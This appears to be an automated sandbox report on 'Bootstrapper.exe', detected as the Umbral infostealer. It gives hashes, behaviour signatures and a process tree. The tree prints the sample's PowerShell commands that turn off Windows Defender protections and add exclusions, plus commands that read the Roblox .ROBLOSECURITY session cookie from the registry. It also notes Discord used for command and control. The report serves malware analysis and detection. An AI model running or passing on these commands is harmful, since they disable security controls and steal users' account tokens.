Analysis
-
max time kernel
16s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
31-07-2024 15:06
Behavioral task
behavioral1
Sample
Bootstrapper.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
Bootstrapper.exe
Resource
win10v2004-20240730-en
General
-
Target
Bootstrapper.exe
-
Size
494KB
-
MD5
b80c04df4f7fd690ce34cf65b30ab204
-
SHA1
c9348af979d56319086f1448d0681def08da6430
-
SHA256
3a1b731d964fa9378d37657812ded01ae6a97b15eb114063555045334eee4c26
-
SHA512
04d0f4399141e44a9ba9579e7d161678f5f9ce8f9b9011ed95e5b239256765ea8fbc989bafb75bc428e330e815359633c8b7438cca603b9849da2cc27eb82fc7
-
SSDEEP
12288:VoZ0L+EP8N6zJW0b3cQNImHHmr0HcPTywWQ+Ples:QI8MzJW0b3cQNImHHmr0iOwWL
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2604-1-0x0000000001140000-0x00000000011C2000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2900 powershell.exe 2528 powershell.exe 2400 powershell.exe 2016 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Bootstrapper.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 9 discord.com 10 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2340 wmic.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2604 Bootstrapper.exe 2900 powershell.exe 2528 powershell.exe 2400 powershell.exe 3008 powershell.exe 2016 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2604 Bootstrapper.exe Token: SeIncreaseQuotaPrivilege 2668 wmic.exe Token: SeSecurityPrivilege 2668 wmic.exe Token: SeTakeOwnershipPrivilege 2668 wmic.exe Token: SeLoadDriverPrivilege 2668 wmic.exe Token: SeSystemProfilePrivilege 2668 wmic.exe Token: SeSystemtimePrivilege 2668 wmic.exe Token: SeProfSingleProcessPrivilege 2668 wmic.exe Token: SeIncBasePriorityPrivilege 2668 wmic.exe Token: SeCreatePagefilePrivilege 2668 wmic.exe Token: SeBackupPrivilege 2668 wmic.exe Token: SeRestorePrivilege 2668 wmic.exe Token: SeShutdownPrivilege 2668 wmic.exe Token: SeDebugPrivilege 2668 wmic.exe Token: SeSystemEnvironmentPrivilege 2668 wmic.exe Token: SeRemoteShutdownPrivilege 2668 wmic.exe Token: SeUndockPrivilege 2668 wmic.exe Token: SeManageVolumePrivilege 2668 wmic.exe Token: 33 2668 wmic.exe Token: 34 2668 wmic.exe Token: 35 2668 wmic.exe Token: SeIncreaseQuotaPrivilege 2668 wmic.exe Token: SeSecurityPrivilege 2668 wmic.exe Token: SeTakeOwnershipPrivilege 2668 wmic.exe Token: SeLoadDriverPrivilege 2668 wmic.exe Token: SeSystemProfilePrivilege 2668 wmic.exe Token: SeSystemtimePrivilege 2668 wmic.exe Token: SeProfSingleProcessPrivilege 2668 wmic.exe Token: SeIncBasePriorityPrivilege 2668 wmic.exe Token: SeCreatePagefilePrivilege 2668 wmic.exe Token: SeBackupPrivilege 2668 wmic.exe Token: SeRestorePrivilege 2668 wmic.exe Token: SeShutdownPrivilege 2668 wmic.exe Token: SeDebugPrivilege 2668 wmic.exe Token: SeSystemEnvironmentPrivilege 2668 wmic.exe Token: SeRemoteShutdownPrivilege 2668 wmic.exe Token: SeUndockPrivilege 2668 wmic.exe Token: SeManageVolumePrivilege 2668 wmic.exe Token: 33 2668 wmic.exe Token: 34 2668 wmic.exe Token: 35 2668 wmic.exe Token: SeDebugPrivilege 2900 powershell.exe Token: SeDebugPrivilege 2528 powershell.exe Token: SeDebugPrivilege 2400 powershell.exe Token: SeDebugPrivilege 3008 powershell.exe Token: SeIncreaseQuotaPrivilege 2752 wmic.exe Token: SeSecurityPrivilege 2752 wmic.exe Token: SeTakeOwnershipPrivilege 2752 wmic.exe Token: SeLoadDriverPrivilege 2752 wmic.exe Token: SeSystemProfilePrivilege 2752 wmic.exe Token: SeSystemtimePrivilege 2752 wmic.exe Token: SeProfSingleProcessPrivilege 2752 wmic.exe Token: SeIncBasePriorityPrivilege 2752 wmic.exe Token: SeCreatePagefilePrivilege 2752 wmic.exe Token: SeBackupPrivilege 2752 wmic.exe Token: SeRestorePrivilege 2752 wmic.exe Token: SeShutdownPrivilege 2752 wmic.exe Token: SeDebugPrivilege 2752 wmic.exe Token: SeSystemEnvironmentPrivilege 2752 wmic.exe Token: SeRemoteShutdownPrivilege 2752 wmic.exe Token: SeUndockPrivilege 2752 wmic.exe Token: SeManageVolumePrivilege 2752 wmic.exe Token: 33 2752 wmic.exe Token: 34 2752 wmic.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 2604 wrote to memory of 2668 2604 Bootstrapper.exe 30 PID 2604 wrote to memory of 2668 2604 Bootstrapper.exe 30 PID 2604 wrote to memory of 2668 2604 Bootstrapper.exe 30 PID 2604 wrote to memory of 2900 2604 Bootstrapper.exe 33 PID 2604 wrote to memory of 2900 2604 Bootstrapper.exe 33 PID 2604 wrote to memory of 2900 2604 Bootstrapper.exe 33 PID 2604 wrote to memory of 2528 2604 Bootstrapper.exe 35 PID 2604 wrote to memory of 2528 2604 Bootstrapper.exe 35 PID 2604 wrote to memory of 2528 2604 Bootstrapper.exe 35 PID 2604 wrote to memory of 2400 2604 Bootstrapper.exe 37 PID 2604 wrote to memory of 2400 2604 Bootstrapper.exe 37 PID 2604 wrote to memory of 2400 2604 Bootstrapper.exe 37 PID 2604 wrote to memory of 3008 2604 Bootstrapper.exe 39 PID 2604 wrote to memory of 3008 2604 Bootstrapper.exe 39 PID 2604 wrote to memory of 3008 2604 Bootstrapper.exe 39 PID 2604 wrote to memory of 2752 2604 Bootstrapper.exe 41 PID 2604 wrote to memory of 2752 2604 Bootstrapper.exe 41 PID 2604 wrote to memory of 2752 2604 Bootstrapper.exe 41 PID 2604 wrote to memory of 2804 2604 Bootstrapper.exe 43 PID 2604 wrote to memory of 2804 2604 Bootstrapper.exe 43 PID 2604 wrote to memory of 2804 2604 Bootstrapper.exe 43 PID 2604 wrote to memory of 1148 2604 Bootstrapper.exe 45 PID 2604 wrote to memory of 1148 2604 Bootstrapper.exe 45 PID 2604 wrote to memory of 1148 2604 Bootstrapper.exe 45 PID 2604 wrote to memory of 2016 2604 Bootstrapper.exe 47 PID 2604 wrote to memory of 2016 2604 Bootstrapper.exe 47 PID 2604 wrote to memory of 2016 2604 Bootstrapper.exe 47 PID 2604 wrote to memory of 2340 2604 Bootstrapper.exe 49 PID 2604 wrote to memory of 2340 2604 Bootstrapper.exe 49 PID 2604 wrote to memory of 2340 2604 Bootstrapper.exe 49
Processes
-
C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2752
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:2804
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:1148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2016
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:2340
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD596b321aed29012fb827c35462bea41ee
SHA184a40ddf4af69013b04115f690ff7c53eb27c1a3
SHA2565ce1d7577244bbdb11428fb90ce82a3e3f701b61b69a188c2d750ef30ff370bf
SHA5121fcf66b619edacdbcc65c6a147a63b255d69376123b27263e8f5b01de2d591316da68ceff1c70276710875f8411b362a3d5a34cdfe4d8cd62608b32a65274f71